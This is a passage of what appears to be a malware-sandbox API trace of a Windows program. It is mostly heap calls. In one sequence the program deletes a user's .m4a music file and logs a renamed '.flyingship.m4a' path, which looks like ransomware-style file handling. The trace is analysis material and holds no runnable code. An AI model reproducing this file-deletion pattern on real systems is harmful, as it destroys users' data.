[0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.840] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0184.840] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.840] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.840] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.840] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0184.840] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0184.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0184.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0184.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0184.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.841] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.842] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.842] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.842] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.842] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.842] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", lpFilePart=0x0) returned 0x57 [0184.844] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f88950, ftCreationTime.dwHighDateTime=0x1d5db3a, ftLastAccessTime.dwLowDateTime=0x15ec7d10, ftLastAccessTime.dwHighDateTime=0x1d5d8e8, ftLastWriteTime.dwLowDateTime=0x136b9b20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10b3f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="snzbfu-3Qx.m4a", cAlternateFileName="SNZBFU~1.M4A")) returned 0x90af58 [0184.844] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\snzbfu-3qx.m4a")) returned 1 [0184.847] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f88950, ftCreationTime.dwHighDateTime=0x1d5db3a, ftLastAccessTime.dwLowDateTime=0x15ec7d10, ftLastAccessTime.dwHighDateTime=0x1d5d8e8, ftLastWriteTime.dwLowDateTime=0x136b9b20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10b3f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="snzbfu-3Qx.m4a", cAlternateFileName="SNZBFU~1.M4A")) returned 0 [0184.847] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0184.848] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.848] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.848] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.848] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.848] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.848] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.848] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.848] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.849] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.849] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.850] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0184.850] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.850] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.850] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0184.850] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2223, lpOverlapped=0x0) returned 1 [0184.851] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0184.851] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x2223, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.851] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0184.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.flyingship.m4a\r\n", cchWideChar=101, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 101 [0184.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x65) returned 0x8e8320 [0184.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.flyingship.m4a\r\n", cchWideChar=101, lpMultiByteStr=0x8e8320, cbMultiByte=101, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 101 [0184.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0184.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0184.851] WriteFile (in: hFile=0x120, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x64, lpOverlapped=0x0) returned 1 [0184.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0184.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.851] CloseHandle (hObject=0x120) returned 1 [0184.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0184.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0184.856] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0184.856] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0184.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0184.857] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0184.857] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.857] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0184.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0184.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0184.857] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0184.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0184.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0184.858] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0184.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.859] HeapFree (in: 